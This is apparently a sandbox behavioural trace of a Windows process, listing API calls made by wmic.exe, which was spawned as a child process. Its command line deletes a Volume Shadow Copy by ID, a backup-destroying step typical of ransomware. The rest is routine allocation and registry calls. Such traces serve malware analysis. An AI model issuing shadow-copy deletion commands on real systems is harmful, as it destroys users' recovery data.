GetConsoleOutputCP () returned 0x1b5 [0116.242] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa5bfe0 | out: lpCPInfo=0x4aa5bfe0) returned 1 [0116.242] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.243] exit (_Code=0) Process: id = "41" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x2a0c2000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xb5c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 224 os_tid = 0xb40 [0114.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f810 | out: lpSystemTimeAsFileTime=0x28f810*(dwLowDateTime=0x4c15d5b0, dwHighDateTime=0x1d68245)) [0114.968] GetCurrentProcessId () returned 0xb04 [0114.968] GetCurrentThreadId () returned 0xb40 [0114.968] GetTickCount () returned 0x115259b [0114.968] QueryPerformanceCounter (in: lpPerformanceCount=0x28f818 | out: lpPerformanceCount=0x28f818*=23486115746) returned 1 [0114.972] GetModuleHandleW (lpModuleName=0x0) returned 0xfff50000 [0114.972] __set_app_type (_Type=0x1) [0114.972] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfff9ced0) returned 0x0 [0114.973] __wgetmainargs (in: _Argc=0xfffc2380, _Argv=0xfffc2390, _Env=0xfffc2388, _DoWildCard=0, _StartInfo=0xfffc239c | out: _Argc=0xfffc2380, _Argv=0xfffc2390, _Env=0xfffc2388) returned 0 [0114.973] ??0CHString@@QEAA@XZ () returned 0xfffc2ab0 [0114.973] malloc (_Size=0x30) returned 0x3e5a50 [0114.973] malloc (_Size=0x70) returned 0x3e5a90 [0114.975] malloc (_Size=0x50) returned 0x3e7d30 [0114.975] malloc (_Size=0x30) returned 0x3e7d90 [0114.975] malloc (_Size=0x48) returned 0x3e7dd0 [0114.975] malloc (_Size=0x30) returned 0x3e7e20 [0114.976] malloc (_Size=0x30) returned 0x3e7e60 [0114.976] ??0CHString@@QEAA@XZ () returned 0xfffc2f58 [0114.976] malloc (_Size=0x30) returned 0x3e7ea0 [0114.976] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0114.976] SetConsoleCtrlHandler (HandlerRoutine=0xfff95724, Add=1) returned 1 [0114.976] _onexit (_Func=0xfffaf378) returned 0xfffaf378 [0114.976] _onexit (_Func=0xfffaf490) returned 0xfffaf490 [0114.976] _onexit (_Func=0xfffaf4d0) returned 0xfffaf4d0 [0114.976] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.976] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0114.980] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0114.987] CoCreateInstance (in: rclsid=0xfff573a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xfff57370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xfffc2940 | out: ppv=0xfffc2940*=0x1cd1390) returned 0x0 [0114.996] GetCurrentProcess () returned 0xffffffffffffffff [0114.996] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f5e0 | out: TokenHandle=0x28f5e0*=0xf4) returned 1 [0114.996] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f5d8 | out: TokenInformation=0x0, ReturnLength=0x28f5d8) returned 0 [0114.996] malloc (_Size=0x118) returned 0x3e69a0 [0114.996] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3e69a0, TokenInformationLength=0x118, ReturnLength=0x28f5d8 | out: TokenInformation=0x3e69a0, ReturnLength=0x28f5d8) returned 1 [0114.996] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3e69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1662469202, Attributes=0x4ea1), (Luid.LowPart=0x0, Luid.HighPart=4095712, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0114.996] free (_Block=0x3e69a0) [0114.996] CloseHandle (hObject=0xf4) returned 1 [0114.997] malloc (_Size=0x40) returned 0x3e7ee0 [0114.997] malloc (_Size=0x40) returned 0x3e7f30 [0114.997] malloc (_Size=0x40) returned 0x3e7f80 [0114.997] malloc (_Size=0x20a) returned 0x3e69a0 [0114.997] GetSystemDirectoryW (in: lpBuffer=0x3e69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.997] free (_Block=0x3e69a0) [0114.997] malloc (_Size=0x18) returned 0x3fdfb0 [0114.997] malloc (_Size=0x18) returned 0x3e69a0 [0114.997] malloc (_Size=0x18) returned 0x3e69c0 [0114.997] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0114.997] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0114.997] free (_Block=0x3fdfb0) [0114.997] free (_Block=0x3e69a0) [0114.997] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0114.998] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.998] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.999] FreeLibrary (hLibModule=0x77940000) returned 1 [0114.999] free (_Block=0x3e69c0) [0114.999] _vsnwprintf (in: _Buffer=0x3e7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x28f208 | out: _Buffer="ms_409") returned 6 [0114.999] malloc (_Size=0x20) returned 0x3e69a0 [0114.999] GetComputerNameW (in: lpBuffer=0x3e69a0, nSize=0x28f5e0 | out: lpBuffer="XDUWTFONO", nSize=0x28f5e0) returned 1 [0114.999] lstrlenW (lpString="XDUWTFONO") returned 9 [0114.999] malloc (_Size=0x14) returned 0x3fdfb0 [0114.999] lstrlenW (lpString="XDUWTFONO") returned 9 [0114.999] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x28f5d8 | out: lpNameBuffer=0x0, nSize=0x28f5d8) returned 0x7fffffdc000 [0115.000] GetLastError () returned 0xea [0115.000] malloc (_Size=0x40) returned 0x3e69d0 [0115.000] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3e69d0, nSize=0x28f5d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28f5d8) returned 0x1 [0115.001] lstrlenW (lpString="") returned 0 [0115.001] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0115.002] lstrlenW (lpString=".") returned 1 [0115.002] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0115.002] lstrlenW (lpString="LOCALHOST") returned 9 [0115.002] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0115.002] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.002] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0115.002] free (_Block=0x3fdfb0) [0115.002] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.002] malloc (_Size=0x14) returned 0x3fdfb0 [0115.003] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.003] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.003] malloc (_Size=0x14) returned 0x3e6a20 [0115.003] lstrlenW (lpString="XDUWTFONO") returned 9 [0115.003] malloc (_Size=0x8) returned 0x3e6a40 [0115.003] malloc (_Size=0x18) returned 0x3e6a60 [0115.003] malloc (_Size=0x30) returned 0x3e6a80 [0115.003] malloc (_Size=0x18) returned 0x3e6ac0 [0115.003] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.003] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.003] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.003] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.003] malloc (_Size=0x30) returned 0x3e6ae0 [0115.003] malloc (_Size=0x18) returned 0x3e6b20 [0115.003] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.003] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.003] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.004] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.004] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.004] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.004] malloc (_Size=0x30) returned 0x3e6b40 [0115.004] malloc (_Size=0x18) returned 0x3e6b80 [0115.004] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.004] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.004] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.004] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.004] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.004] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.004] malloc (_Size=0x30) returned 0x3e6ba0 [0115.004] malloc (_Size=0x18) returned 0x3e6be0 [0115.004] malloc (_Size=0x30) returned 0x3e6c00 [0115.004] malloc (_Size=0x18) returned 0x3e6c40 [0115.004] SysStringLen (param_1="NONE") returned 0x4 [0115.004] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.004] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.004] SysStringLen (param_1="NONE") returned 0x4 [0115.004] malloc (_Size=0x30) returned 0x3e6c60 [0115.004] malloc (_Size=0x18) returned 0x3e6ca0 [0115.004] SysStringLen (param_1="CONNECT") returned 0x7 [0115.004] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.004] malloc (_Size=0x30) returned 0x3e6cc0 [0115.004] malloc (_Size=0x18) returned 0x3e6d00 [0115.004] SysStringLen (param_1="CALL") returned 0x4 [0115.005] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.005] SysStringLen (param_1="CALL") returned 0x4 [0115.005] SysStringLen (param_1="CONNECT") returned 0x7 [0115.005] malloc (_Size=0x30) returned 0x3e6d20 [0115.005] malloc (_Size=0x18) returned 0x3e6d60 [0115.005] SysStringLen (param_1="PKT") returned 0x3 [0115.005] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.005] SysStringLen (param_1="PKT") returned 0x3 [0115.005] SysStringLen (param_1="NONE") returned 0x4 [0115.005] SysStringLen (param_1="NONE") returned 0x4 [0115.005] SysStringLen (param_1="PKT") returned 0x3 [0115.005] malloc (_Size=0x30) returned 0x3e6d80 [0115.005] malloc (_Size=0x18) returned 0x3e6dc0 [0115.005] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.005] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.005] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.005] SysStringLen (param_1="NONE") returned 0x4 [0115.005] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.005] SysStringLen (param_1="PKT") returned 0x3 [0115.005] SysStringLen (param_1="PKT") returned 0x3 [0115.005] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.005] malloc (_Size=0x30) returned 0x3e8000 [0115.006] malloc (_Size=0x18) returned 0x3e6de0 [0115.006] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.006] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.006] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.006] SysStringLen (param_1="PKT") returned 0x3 [0115.006] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.006] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.006] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.006] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.006] malloc (_Size=0x30) returned 0x3e8040 [0115.006] malloc (_Size=0x40) returned 0x3e6e00 [0115.007] malloc (_Size=0x20a) returned 0x3e6e50 [0115.007] GetSystemDirectoryW (in: lpBuffer=0x3e6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.007] free (_Block=0x3e6e50) [0115.007] malloc (_Size=0x18) returned 0x3e6e50 [0115.007] malloc (_Size=0x18) returned 0x3e6e70 [0115.007] malloc (_Size=0x18) returned 0x3e6e90 [0115.007] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0115.007] SysStringLen (param_1="\\wbem\\") returned 0x6 [0115.007] free (_Block=0x3e6e50) [0115.007] free (_Block=0x3e6e70) [0115.007] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0115.007] free (_Block=0x3e6e90) [0115.007] malloc (_Size=0x18) returned 0x3e6e50 [0115.007] malloc (_Size=0x18) returned 0x3e6e70 [0115.007] malloc (_Size=0x18) returned 0x3e6e90 [0115.007] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0115.007] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0115.008] free (_Block=0x3e6e50) [0115.008] free (_Block=0x3e6e70) [0115.008] GetCurrentThreadId () returned 0xb40 [0115.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x28eee0 | out: phkResult=0x28eee0*=0xf8) returned 0x0 [0115.008] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x28ef30, lpcbData=0x28eed0*=0x400 | out: lpType=0x0, lpData=0x28ef30*=0x30, lpcbData=0x28eed0*=0x4) returned 0x0 [0115.008] _wcsicmp (_String1="0", _String2="1") returned -1 [0115.008] _wcsicmp (_String1="0", _String2="2") returned -2 [0115.008] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x28eed0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x28eed0*=0x42) returned 0x0 [0115.008] malloc (_Size=0x86) returned 0x3e6eb0 [0115.008] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3e6eb0, lpcbData=0x28eed0*=0x42 | out: lpType=0x0, lpData=0x3e6eb0*=0x25, lpcbData=0x28eed0*=0x42) returned 0x0 [0115.008] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.008] malloc (_Size=0x42) returned 0x3e6f40 [0115.008] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.008] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x28ef30, lpcbData=0x28eed0*=0x400 | out: lpType=0x0, lpData=0x28ef30*=0x36, lpcbData=0x28eed0*=0xc) returned 0x0 [0115.008] _wtol (_String="65536") returned 65536 [0115.009] free (_Block=0x3e6eb0) [0115.009] RegCloseKey (hKey=0x0) returned 0x6 [0115.009] CoCreateInstance (in: rclsid=0xfff57410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xfff573f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x28f3d8 | out: ppv=0x28f3d8*=0x21071d0) returned 0x0 [0115.030] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x21071d0, xmlSource=0x28f520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x3e6e50), isSuccessful=0x28f590 | out: isSuccessful=0x28f590*=0xffff) returned 0x0 [0115.136] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21071d0, DOMElement=0x28f3d0 | out: DOMElement=0x28f3d0) returned 0x0 [0115.136] malloc (_Size=0x18) returned 0x3e6e50 [0115.136] free (_Block=0x3e6e50) [0115.137] malloc (_Size=0x18) returned 0x3e6e50 [0115.137] free (_Block=0x3e6e50) [0115.137] malloc (_Size=0x18) returned 0x3e6e50 [0115.137] malloc (_Size=0x18) returned 0x3e6e70 [0115.137] malloc (_Size=0x30) returned 0x3e8080 [0115.137] malloc (_Size=0x18) returned 0x3e6eb0 [0115.137] free (_Block=0x3e6eb0) [0115.137] malloc (_Size=0x18) returned 0x3ec560 [0115.137] malloc (_Size=0x18) returned 0x3ec580 [0115.137] SysStringLen (param_1="VALUE") returned 0x5 [0115.137] SysStringLen (param_1="TABLE") returned 0x5 [0115.138] SysStringLen (param_1="TABLE") returned 0x5 [0115.138] SysStringLen (param_1="VALUE") returned 0x5 [0115.138] malloc (_Size=0x30) returned 0x3e80c0 [0115.138] malloc (_Size=0x18) returned 0x3ec5a0 [0115.138] free (_Block=0x3ec5a0) [0115.138] malloc (_Size=0x18) returned 0x3ec5a0 [0115.138] malloc (_Size=0x18) returned 0x3ec5c0 [0115.138] SysStringLen (param_1="LIST") returned 0x4 [0115.138] SysStringLen (param_1="TABLE") returned 0x5 [0115.138] malloc (_Size=0x30) returned 0x3e8100 [0115.138] malloc (_Size=0x18) returned 0x3ec5e0 [0115.138] free (_Block=0x3ec5e0) [0115.138] malloc (_Size=0x18) returned 0x3ec5e0 [0115.139] malloc (_Size=0x18) returned 0x3ec600 [0115.139] SysStringLen (param_1="RAWXML") returned 0x6 [0115.139] SysStringLen (param_1="TABLE") returned 0x5 [0115.139] SysStringLen (param_1="RAWXML") returned 0x6 [0115.139] SysStringLen (param_1="LIST") returned 0x4 [0115.139] SysStringLen (param_1="LIST") returned 0x4 [0115.139] SysStringLen (param_1="RAWXML") returned 0x6 [0115.139] malloc (_Size=0x30) returned 0x3e8140 [0115.139] malloc (_Size=0x18) returned 0x3ec620 [0115.139] free (_Block=0x3ec620) [0115.139] malloc (_Size=0x18) returned 0x3ec620 [0115.139] malloc (_Size=0x18) returned 0x3ec640 [0115.139] SysStringLen (param_1="HTABLE") returned 0x6 [0115.139] SysStringLen (param_1="TABLE") returned 0x5 [0115.139] SysStringLen (param_1="HTABLE") returned 0x6 [0115.139] SysStringLen (param_1="LIST") returned 0x4 [0115.139] malloc (_Size=0x30) returned 0x3e8180 [0115.139] malloc (_Size=0x18) returned 0x3ec660 [0115.140] free (_Block=0x3ec660) [0115.140] malloc (_Size=0x18) returned 0x3ec660 [0115.140] malloc (_Size=0x18) returned 0x3ec680 [0115.140] SysStringLen (param_1="HFORM") returned 0x5 [0115.140] SysStringLen (param_1="TABLE") returned 0x5 [0115.140] SysStringLen (param_1="HFORM") returned 0x5 [0115.140] SysStringLen (param_1="LIST") returned 0x4 [0115.140] SysStringLen (param_1="HFORM") returned 0x5 [0115.140] SysStringLen (param_1="HTABLE") returned 0x6 [0115.140] malloc (_Size=0x30) returned 0x3e81c0 [0115.140] malloc (_Size=0x18) returned 0x3ec6a0 [0115.140] free (_Block=0x3ec6a0) [0115.140] malloc (_Size=0x18) returned 0x3ec6a0 [0115.140] malloc (_Size=0x18) returned 0x3ec6c0 [0115.140] SysStringLen (param_1="XML") returned 0x3 [0115.140] SysStringLen (param_1="TABLE") returned 0x5 [0115.140] SysStringLen (param_1="XML") returned 0x3 [0115.140] SysStringLen (param_1="VALUE") returned 0x5 [0115.140] SysStringLen (param_1="VALUE") returned 0x5 [0115.140] SysStringLen (param_1="XML") returned 0x3 [0115.140] malloc (_Size=0x30) returned 0x3e8200 [0115.141] malloc (_Size=0x18) returned 0x3ec6e0 [0115.141] free (_Block=0x3ec6e0) [0115.141] malloc (_Size=0x18) returned 0x3ec6e0 [0115.141] malloc (_Size=0x18) returned 0x3ec700 [0115.141] SysStringLen (param_1="MOF") returned 0x3 [0115.141] SysStringLen (param_1="TABLE") returned 0x5 [0115.141] SysStringLen (param_1="MOF") returned 0x3 [0115.141] SysStringLen (param_1="LIST") returned 0x4 [0115.141] SysStringLen (param_1="MOF") returned 0x3 [0115.141] SysStringLen (param_1="RAWXML") returned 0x6 [0115.141] SysStringLen (param_1="LIST") returned 0x4 [0115.141] SysStringLen (param_1="MOF") returned 0x3 [0115.141] malloc (_Size=0x30) returned 0x3e8240 [0115.141] malloc (_Size=0x18) returned 0x3ec720 [0115.141] free (_Block=0x3ec720) [0115.142] malloc (_Size=0x18) returned 0x3ec720 [0115.142] malloc (_Size=0x18) returned 0x3ec740 [0115.142] SysStringLen (param_1="CSV") returned 0x3 [0115.142] SysStringLen (param_1="TABLE") returned 0x5 [0115.142] SysStringLen (param_1="CSV") returned 0x3 [0115.142] SysStringLen (param_1="LIST") returned 0x4 [0115.142] SysStringLen (param_1="CSV") returned 0x3 [0115.142] SysStringLen (param_1="HTABLE") returned 0x6 [0115.142] SysStringLen (param_1="CSV") returned 0x3 [0115.142] SysStringLen (param_1="HFORM") returned 0x5 [0115.142] malloc (_Size=0x30) returned 0x3e8280 [0115.142] malloc (_Size=0x18) returned 0x3ec760 [0115.142] free (_Block=0x3ec760) [0115.142] malloc (_Size=0x18) returned 0x3ec760 [0115.142] malloc (_Size=0x18) returned 0x3ec780 [0115.142] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.142] SysStringLen (param_1="TABLE") returned 0x5 [0115.142] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.142] SysStringLen (param_1="VALUE") returned 0x5 [0115.142] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.142] SysStringLen (param_1="XML") returned 0x3 [0115.142] SysStringLen (param_1="XML") returned 0x3 [0115.143] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.143] malloc (_Size=0x30) returned 0x3e82c0 [0115.143] malloc (_Size=0x18) returned 0x3ec7a0 [0115.143] free (_Block=0x3ec7a0) [0115.143] malloc (_Size=0x18) returned 0x3ec7a0 [0115.143] malloc (_Size=0x18) returned 0x3ec7c0 [0115.143] SysStringLen (param_1="texttablewsys") returned 0xd [0115.143] SysStringLen (param_1="TABLE") returned 0x5 [0115.143] SysStringLen (param_1="texttablewsys") returned 0xd [0115.143] SysStringLen (param_1="XML") returned 0x3 [0115.143] SysStringLen (param_1="texttablewsys") returned 0xd [0115.143] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.143] SysStringLen (param_1="XML") returned 0x3 [0115.143] SysStringLen (param_1="texttablewsys") returned 0xd [0115.143] malloc (_Size=0x30) returned 0x3e8300 [0115.144] malloc (_Size=0x18) returned 0x3ec7e0 [0115.144] free (_Block=0x3ec7e0) [0115.144] malloc (_Size=0x18) returned 0x3ec7e0 [0115.144] malloc (_Size=0x18) returned 0x3ec800 [0115.144] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.144] SysStringLen (param_1="TABLE") returned 0x5 [0115.144] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.144] SysStringLen (param_1="XML") returned 0x3 [0115.144] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.144] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.144] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.144] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.144] malloc (_Size=0x30) returned 0x3e8340 [0115.144] malloc (_Size=0x18) returned 0x3ec820 [0115.144] free (_Block=0x3ec820) [0115.144] malloc (_Size=0x18) returned 0x3ec820 [0115.144] malloc (_Size=0x18) returned 0x3ec840 [0115.144] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.144] SysStringLen (param_1="TABLE") returned 0x5 [0115.145] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.145] SysStringLen (param_1="XML") returned 0x3 [0115.145] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.145] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.145] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.145] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.145] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.145] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.145] malloc (_Size=0x30) returned 0x3e8380 [0115.145] malloc (_Size=0x18) returned 0x3ec860 [0115.145] free (_Block=0x3ec860) [0115.145] malloc (_Size=0x18) returned 0x3ec860 [0115.145] malloc (_Size=0x18) returned 0x3ec880 [0115.145] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.145] SysStringLen (param_1="TABLE") returned 0x5 [0115.145] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.145] SysStringLen (param_1="XML") returned 0x3 [0115.145] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.145] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.145] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.145] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.145] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.145] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.145] malloc (_Size=0x30) returned 0x3e83c0 [0115.146] malloc (_Size=0x18) returned 0x3ec8a0 [0115.146] free (_Block=0x3ec8a0) [0115.146] malloc (_Size=0x18) returned 0x3ec8a0 [0115.146] malloc (_Size=0x18) returned 0x3ec8c0 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] SysStringLen (param_1="TABLE") returned 0x5 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] SysStringLen (param_1="XML") returned 0x3 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.146] SysStringLen 